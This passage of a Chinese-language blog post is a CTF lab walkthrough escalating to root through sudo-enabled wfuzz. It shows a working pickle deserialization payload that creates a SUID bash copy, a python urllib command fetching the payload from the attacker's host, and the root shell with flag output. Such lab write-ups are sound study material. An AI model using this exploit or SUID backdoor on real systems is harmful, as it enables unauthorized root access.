class="string">&#x27;console_scripts&#x27;</span>, <span class="string">&#x27;wfuzz&#x27;</span>)())</span><br></pre></td></tr></table></figure>
<h3 id="脚本的核心作用"><a href="#脚本的核心作用" class="headerlink" title="脚本的核心作用"></a>脚本的核心作用</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">这个脚本的核心作用是作为一个“引导程序”。当你直接在终端中输入 `wfuzz`并执行时，系统最终会运行这个脚本。它的任务很简单：找到 `wfuzz`软件包中真正的命令行主程序，并启动它。</span><br><span class="line">你可以把这种关系理解为：这个 `/usr/bin/wfuzz`脚本是一个统一的“前台接待员”，而真正的“业务处理部门”可能安装在系统Python环境的某个目录里。这个脚本负责把两者连接起来</span><br></pre></td></tr></table></figure>

<p><code>cat /usr/bin/id</code> 一堆乱码<br>![[Pasted image 20260108162537.png]]<br>(此处别人的wp方案)发现 <code>wfuzzp payload</code>， 查看其帮助：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo /usr/bin/wfuzz -z help --slice wfuzzp</span><br></pre></td></tr></table></figure>

<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">tao@111:/tmp$ <span class="built_in">sudo</span> /usr/bin/wfuzz -z <span class="built_in">help</span> --slice wfuzzp</span><br><span class="line"> /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz<span class="string">&#x27;s documentation for more information.</span></span><br><span class="line"><span class="string">Name: wfuzzp 0.2</span></span><br><span class="line"><span class="string">Categories: default</span></span><br><span class="line"><span class="string">Summary: Returns fuzz results&#x27;</span> URL from a previous stored wfuzz session.</span><br><span class="line">Author: Xavi Mendez (@xmendez)</span><br><span class="line">Description:</span><br><span class="line">   This payload uses pickle.</span><br><span class="line">   Warning: The pickle module is not intended to be secure against erroneous or maliciously constructed data.</span><br><span class="line">   Never unpickle data received from an untrusted or unauthenticated <span class="built_in">source</span>.</span><br><span class="line">   See: https://blog.nelhage.com/2011/03/exploiting-pickle/</span><br><span class="line">Parameters:</span><br><span class="line">   + fn (= ): Filename of a valid wfuzz result file.</span><br><span class="line">   - attr: Attribute of fuzzresult to <span class="built_in">return</span>. If not specified the whole object is returned.</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>查看wfuzz的路径</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">tao@111:~$ <span class="built_in">which</span> wfuzz</span><br><span class="line">/usr/bin/wfuzz</span><br><span class="line">tao@111:~$  python3 -c <span class="string">&#x27;import wfuzz; print(wfuzz.__file__)&#x27;</span></span><br><span class="line"> /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz<span class="string">&#x27;s documentation for more information.</span></span><br><span class="line"><span class="string">/usr/lib/python3/dist-packages/wfuzz/__init__.py </span></span><br></pre></td></tr></table></figure>

<p>查找关键字（<code>exec、eval、system 和 pickle</code>）这块卡主了也是问下别人的了思路</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">tao@111:~$ grep -r &#x27;pickle&#x27; /usr/lib/python3/dist-packages/wfuzz/</span><br><span class="line">Binary file /usr/lib/python3/dist-packages/wfuzz/plugins/payloads/__pycache__/wfuzzp.cpython-39.pyc matches</span><br><span class="line">/usr/lib/python3/dist-packages/wfuzz/plugins/payloads/wfuzzp.py:import pickle as pickle</span><br><span class="line">/usr/lib/python3/dist-packages/wfuzz/plugins/payloads/wfuzzp.py:        </span><br><span class="line">&quot;This payload uses pickle.&quot;,</span><br><span class="line">/usr/lib/python3/dist-packages/wfuzz/plugins/payloads/wfuzzp.py:        &quot;Warning: The pickle module is not intended to be secure against erroneous or maliciously constructed data.&quot;,</span><br><span class="line">/usr/lib/python3/dist-packages/wfuzz/plugins/payloads/wfuzzp.py:       </span><br><span class="line"> &quot;Never unpickle data received from an untrusted or unauthenticated source.&quot;,</span><br><span class="line">/usr/lib/python3/dist-packages/wfuzz/plugins/payloads/wfuzzp.py:        </span><br><span class="line">&quot;See: https://blog.nelhage.com/2011/03/exploiting-pickle/&quot;,</span><br><span class="line">/usr/lib/python3/dist-packages/wfuzz/plugins/payloads/wfuzzp.py:                    item = pickle.load(output)</span><br><span class="line">Binary file /usr/lib/python3/dist-packages/wfuzz/__pycache__/fuzzqueues.cpython-39.pyc matches</span><br><span class="line">/usr/lib/python3/dist-packages/wfuzz/fuzzqueues.py:import pickle as pickle</span><br><span class="line">/usr/lib/python3/dist-packages/wfuzz/fuzzqueues.py:        pickle.dump(item, self.output_fn)</span><br></pre></td></tr></table></figure>
<p>命令解释：</p>
<ul>
<li><code>-r</code>: 递归搜索（Recursive），搜索该目录及其所有子目录下的文件。</li>
<li><code>pickle</code>: 我要查找的关键字符串，它是 Python 中反序列化模块的名称。</li>
<li><code>/usr/lib/python3/dist-packages/wfuzz/</code>: 搜索的目标路径。</li>
</ul>
<p>搜索wfuzz存在的漏洞 <strong>反序列化</strong><br>“介绍一下python中的 Pickle …”点击查看元宝的回答<br><a target="_blank" rel="noopener" href="https://yb.tencent.com/s/YRwA173TC8v7">https://yb.tencent.com/s/YRwA173TC8v7</a></p>
<p><strong>关键原理</strong>：Pickle 反序列化 <code>wfuzz</code> 在加载文件时，使用的是 Python 的 <strong><code>pickle</code></strong> 模块。</p>
<ul>
<li><strong>序列化</strong>: 把内存中的对象（比如代码、数据）变成二进制流保存到文件。</li>
<li><strong>反序列化</strong>: 把文件中的二进制流变回内存对象。</li>
<li><strong>漏洞</strong>: <code>pickle</code> 是不安全的。如果我们在文件中构造一段恶意的二进制流，当程序（以 root 权限）反序列化它时，就会自动执行我们在其中嵌入的恶意代码。</li>
</ul>
<h3 id="制作payload"><a href="#制作payload" class="headerlink" title="制作payload"></a>制作payload</h3><p>让AI写一个python脚本</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># gen_pickle.py</span></span><br><span class="line"><span class="keyword">import</span> pickle</span><br><span class="line"><span class="keyword">import</span> os</span><br><span class="line"></span><br><span class="line"><span class="keyword">class</span> <span class="title class_">RCE</span>:</span><br><span class="line">    <span class="keyword">def</span> <span class="title function_">__reduce__</span>(<span class="params">self</span>):</span><br><span class="line">        <span class="comment"># 这段代码会被靶机以 root 权限执行</span></span><br><span class="line">        <span class="comment"># 1. 复制 /bin/bash 到 /tmp/rootbash</span></span><br><span class="line">        <span class="comment"># 2. chmod +s 赋予 SUID 权限</span></span><br><span class="line">        cmd = <span class="string">&quot;cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash&quot;</span></span><br><span class="line">        <span class="keyword">return</span> (os.system, (cmd,))</span><br><span class="line"></span><br><span class="line"><span class="comment"># 生成恶意的 pickle 数据并写入文件</span></span><br><span class="line"><span class="keyword">with</span> <span class="built_in">open</span>(<span class="string">&quot;pwn.pickle&quot;</span>, <span class="string">&quot;wb&quot;</span>) <span class="keyword">as</span> f:</span><br><span class="line">    f.write(pickle.dumps(RCE()))</span><br></pre></td></tr></table></figure>

<p><code>/usr/lib/python3/dist-packages/wfuzz/plugins/payloads/wfuzzp.py</code><br>在上面这个路径的文件中，有非常关键的一行代码决定了我们需要使用 Gzip 格式：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">1</span>     <span class="keyword">def</span> <span class="title function_">_gen_wfuzz</span>(<span class="params">self, output_fn</span>):</span><br><span class="line"><span class="number">2</span>         <span class="keyword">try</span>:</span><br><span class="line"><span class="number">3</span>             <span class="comment"># 这里的 gzip.open 是关键证据</span></span><br><span class="line"><span class="number">4</span>             <span class="keyword">with</span> gzip.<span class="built_in">open</span>(<span class="variable language_">self</span>.find_file(output_fn), <span class="string">&quot;r+b&quot;</span>) <span class="keyword">as</span> 	output:</span><br><span class="line"><span class="number">5</span>                 <span class="keyword">while</span> <span class="number">1</span>:</span><br><span class="line"><span class="number">6</span>                     item = pickle.load(output)</span><br><span class="line"><span class="number">7</span>                     <span class="comment"># ...</span></span><br></pre></td></tr></table></figure>
<p><code>wfuzz</code> 在加载文件时会检查文件是否是 Gzip 压缩格式，所以我们需要压缩它：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">┌──(root㉿kali)-[~/localkali/testpayload]</span><br><span class="line">└─# nano gen_pickle.py                 </span><br><span class="line"></span><br><span class="line">┌──(root㉿kali)-[~/localkali/testpayload]</span><br><span class="line">└─# python3 gen_pickle.py</span><br><span class="line"></span><br><span class="line">┌──(root㉿kali)-[~/localkali/testpayload]</span><br><span class="line">└─# <span class="built_in">ls</span> -l            </span><br><span class="line">总计 8</span><br><span class="line">-rw-r--r-- 1 root root 442  1月 8日 20:49 gen_pickle.py</span><br><span class="line">-rw-r--r-- 1 root root  88  1月 8日 20:50 pwn.pickle</span><br><span class="line">    </span><br><span class="line">┌──(root㉿kali)-[~/localkali/testpayload]</span><br><span class="line">└─# gzip -f pwn.pickle </span><br><span class="line">            </span><br><span class="line">┌──(root㉿kali)-[~/localkali/testpayload]</span><br><span class="line">└─# <span class="built_in">ls</span> -l</span><br><span class="line">总计 8</span><br><span class="line">-rw-r--r-- 1 root root 442  1月 8日 20:49 gen_pickle.py</span><br><span class="line">-rw-r--r-- 1 root root 101  1月 8日 20:50 pwn.pickle.gz</span><br><span class="line"></span><br><span class="line">┌──(root㉿kali)-[~/localkali/testpayload]</span><br><span class="line">└─# python3 -m http.server 8000               </span><br><span class="line">Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...</span><br><span class="line">192.168.3.42 - - [08/Jan/2026 20:54:41] <span class="string">&quot;GET /pwn.pickle.gz HTTP/1.1&quot;</span> 200 -</span><br></pre></td></tr></table></figure>

<p>下载至靶机（靶机无<code>wget</code>）</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">tao@111:~$ <span class="built_in">cd</span> /tmp</span><br><span class="line">tao@111:/tmp$ <span class="built_in">ls</span> -l</span><br><span class="line">total 12</span><br><span class="line">drwx------ 3 root root 4096 Jan  8 06:39 systemd-private-3cb28010eb0f4f118ffa13ace144e9dc-apache2.service-s9679i</span><br><span class="line">drwx------ 3 root root 4096 Jan  8 06:39 systemd-private-3cb28010eb0f4f118ffa13ace144e9dc-systemd-logind.service-8WCDuh</span><br><span class="line">drwx------ 3 root root 4096 Jan  8 06:39 systemd-private-3cb28010eb0f4f118ffa13ace144e9dc-systemd-timesyncd.service-AM08Di</span><br><span class="line">tao@111:/tmp$ wget -h</span><br><span class="line">-bash: wget: <span class="built_in">command</span> not found</span><br><span class="line">tao@111:/tmp$ curl -h</span><br><span class="line">-bash: curl: <span class="built_in">command</span> not found</span><br><span class="line">tao@111:/tmp$ python3 -c <span class="string">&quot;import urllib.request; urllib.request.urlretrieve(&#x27;http://192.168.3.43:8000/pwn.pickle.gz&#x27;, &#x27;/tmp/pwn.pickl</span></span><br><span class="line"><span class="string">e.gz&#x27;)&quot;</span></span><br><span class="line">tao@111:/tmp$ <span class="built_in">ls</span> -l</span><br><span class="line">total 16</span><br><span class="line">-rw-r--r-- 1 tao  tao   101 Jan  8 07:54 pwn.pickle.gz</span><br><span class="line">drwx------ 3 root root 4096 Jan  8 06:39 systemd-private-3cb28010eb0f4f118ffa13ace144e9dc-apache2.service-s9679i</span><br><span class="line">drwx------ 3 root root 4096 Jan  8 06:39 systemd-private-3cb28010eb0f4f118ffa13ace144e9dc-systemd-logind.service-8WCDuh</span><br><span class="line">drwx------ 3 root root 4096 Jan  8 06:39 systemd-private-3cb28010eb0f4f118ffa13ace144e9dc-systemd-timesyncd.service-AM08Di</span><br><span class="line">tao@111:/tmp$ </span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h3 id="执行payload"><a href="#执行payload" class="headerlink" title="执行payload"></a>执行payload</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">tao@111:/tmp$ <span class="built_in">sudo</span> wfuzz -z wfuzz,/tmp/pwn.pickle.gz -u http://127.0.0.1/FUZZ</span><br><span class="line"> /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz<span class="string">&#x27;s documentation for more information.</span></span><br><span class="line"><span class="string">********************************************************</span></span><br><span class="line"><span class="string">* Wfuzz 3.1.0 - The Web Fuzzer                         *</span></span><br><span class="line"><span class="string">********************************************************</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">Target: http://127.0.0.1/FUZZ</span></span><br><span class="line"><span class="string">Total requests: &lt;&lt;unknown&gt;&gt;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">=====================================================================</span></span><br><span class="line"><span class="string">ID           Response   Lines    Word       Chars       Payload                                                             </span></span><br><span class="line"><span class="string">=====================================================================</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">Total time: 0</span></span><br><span class="line"><span class="string">Processed Requests: 0</span></span><br><span class="line"><span class="string">Filtered Requests: 0</span></span><br><span class="line"><span class="string">Requests/sec.: 0</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> /usr/lib/python3/dist-packages/wfuzz/wfuzz.py:78: UserWarning:Fatal exception: Wrong wfuzz payload format, the object read is not a valid fuzz result.</span></span><br><span class="line"><span class="string">tao@111:/tmp$ </span></span><br></pre></td></tr></table></figure>

<p><code>-z wfuzz,/tmp/pwn.pickle.gz</code> ：<br><strong>核心参数</strong>：指定 payload 生成器</p>
<ul>
<li><code>-z</code>：Wfuzz 中用于定义 payload 源的核心参数，格式为 <code>类型,参数</code></li>
<li><code>wfuzz</code>：payload 类型，表示加载 Wfuzz 专用的<strong>序列化（pickle）格式文件</strong></li>
<li><code>/tmp/pwn.pickle.gz</code>：指定待加载的 pickle 压缩文件路径</li>
</ul>
<p><code>-u http://127.0.0.1/FUZZ</code> ：<br>指定测试目标 URL</p>
<ul>
<li><code>-u</code>：目标 URL 参数</li>
<li><code>FUZZ</code>：Wfuzz 的占位符，执行时会被 payload 文件中的每一个值替换</li>
</ul>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">tao@111:/tmp$ <span class="built_in">ls</span> -l /tmp/rootbash</span><br><span class="line">-rwsr-sr-x 1 root root 1168776 Jan  8 07:58 /tmp/rootbash</span><br><span class="line"><span class="comment"># 结果显示：-rwsr-sr-x 1 root root ...</span></span><br><span class="line"><span class="comment"># 注意那个 &#x27;s&#x27;，代表 SUID 权限设置成功。</span></span><br></pre></td></tr></table></figure>

<h3 id="使用payload"><a href="#使用payload" class="headerlink" title="使用payload"></a>使用payload</h3><p> 进入<code>root shell</code>,  <code>-p</code> 代表 <em>Privileged mode</em>（特权模式）</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">tao@111:/tmp$ /tmp/rootbash -p</span><br><span class="line">rootbash-5.0# <span class="built_in">whoami</span></span><br><span class="line">root</span><br><span class="line">rootbash-5.0# /usr/bin/id</span><br><span class="line">uid=1000(tao) gid=1000(tao) euid=0(root) egid=0(root) <span class="built_in">groups</span>=0(root),1000(tao)</span><br><span class="line">rootbash-5.0# <span class="built_in">cd</span> /root</span><br><span class="line">rootbash-5.0# <span class="built_in">ls</span></span><br><span class="line">111.txt  root.txt</span><br><span class="line">rootbash-5.0# <span class="built_in">cat</span> 111.txt </span><br><span class="line">q6I42RCMyMkDV45svyuF</span><br><span class="line">rootbash-5.0# <span class="built_in">cat</span> root.txt </span><br><span class="line">flag&#123;root-9bbd7af2a042a901b92dc203b3896621&#125;</span><br></pre></td></tr></table></figure>
  </div>
</article>



    </div>
    
      <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a href="/archives/">Writing</a></li>
         
          <li><a target="_blank" rel="noopener" href="https://github.com/zhaochoudecat">Projects</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%8E%A2%E6%B5%8B"><span class="toc-number">1.</span> <span class="toc-text">探测</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#nmap"><span class="toc-number">1.1.</span> <span class="toc-text">nmap</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#gobuster"><span class="toc-number">1.2.</span> <span class="toc-text">gobuster</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#wfuzz"><span class="toc-number">1.3.</span> <span class="toc-text">wfuzz</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%9E%84%E9%80%A0payload"><span class="toc-number">2.</span> <span class="toc-text">构造payload</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#hydra"><span class="toc-number">3.</span> <span class="toc-text">hydra</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#ssh"><span class="toc-number">4.</span> <span class="toc-text">ssh</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%8F%90%E6%9D%83"><span class="toc-number">5.</span> <span class="toc-text">提权</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%84%9A%E6%9C%AC%E7%9A%84%E6%A0%B8%E5%BF%83%E4%BD%9C%E7%94%A8"><span class="toc-number">5.1.</span> <span class="toc-text">脚本的核心作用</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%88%B6%E4%BD%9Cpayload"><span class="toc-number">5.2.</span> <span class="toc-text">制作payload</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%89%A7%E8%A1%8Cpayload"><span class="toc-number">5.3.</span> <span class="toc-text">执行payload</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%BD%BF%E7%94%A8payload"><span class="toc-number">5.4.</span> <span class="toc-text">使用payload</span></a></li></ol></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://zhaochoudecat.github.io/2026/01/08/QQGroup/111/111/"><i class="fa fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://zhaochoudecat.github.io/2026/01/08/QQGroup/111/111/&text="><i class="fa fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://zhaochoudecat.github.io/2026/01/08/QQGroup/111/111/&title="><i class="fa fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://zhaochoudecat.github.io/2026/01/08/QQGroup/111/111/&is_video=false&description="><i class="fa fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=&body=Check out this article: https://zhaochoudecat.github.io/2026/01/08/QQGroup/111/111/"><i class="fa fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://zhaochoudecat.github.io/2026/01/08/QQGroup/111/111/&title="><i class="fa fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://zhaochoudecat.github.io/2026/01/08/QQGroup/111/111/&title="><i class="fa fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://zhaochoudecat.github.io/2026/01/08/QQGroup/111/111/&title="><i class="fa fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://zhaochoudecat.github.io/2026/01/08/QQGroup/111/111/&title="><i class="fa fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://zhaochoudecat.github.io/2026/01/08/QQGroup/111/111/&name=&description="><i class="fa fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
      <ul>
        <li id="toc"><a class="icon" href="#" onclick='$("#toc-footer").toggle();return false;'><i class="fa fa-list fa-lg" aria-hidden="true"></i> TOC</a></li>
        <li id="share"><a class="icon" href="#" onclick='$("#share-footer").toggle();return false;'><i class="fa fa-share-alt fa-lg" aria-hidden="true"></i> Share</a></li>
        <li id="top" style="display:none"><a class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a></li>
        <li id="menu"><a class="icon" href="#" onclick='$("#nav-footer").toggle();return false;'><i class="fa fa-bars fa-lg" aria-hidden="true"></i> Menu</a></li>
      </ul>
    </div>

  </div>
</div>

    
    <footer id="footer">
  <div class="footer-left">
    Copyright &copy; 2026 zhaochoudecat
  </div>
  <div class="footer-right">
    <nav>
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a href="/archives/">Writing</a></li>
         
          <li><a target="_blank" rel="noopener" href="https://github.com/zhaochoudecat">Projects</a></li>
        
      </ul>
    </nav>
  </div>
</footer>

</body>
</html>
<!-- styles -->

<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css">


<link rel="stylesheet" href="/lib/meslo-LG/styles.css">


<link rel="stylesheet" href="/lib/justified-gallery/justifiedGallery.min.css">



<!-- jquery -->

<script src="/lib/jquery/jquery.min.js"></script>


<script src="/lib/justified-gallery/jquery.justifiedGallery.min.js"></script>


<script src="/js/main.js"></script>

<!-- Google Analytics -->

    <script type="text/javascript">
        (function(i,s,o,g,r,a,m) {i['GoogleAnalyticsObject']=r;i[r]=i[r]||function() {
        (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
        m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
        })(window,document,'script','//www.google-analytics.com/analytics.js','ga');
        ga('create', 'UA-86660611-1', 'auto');
        ga('send', 'pageview');
    </script>

<!-- Disqus Comments -->


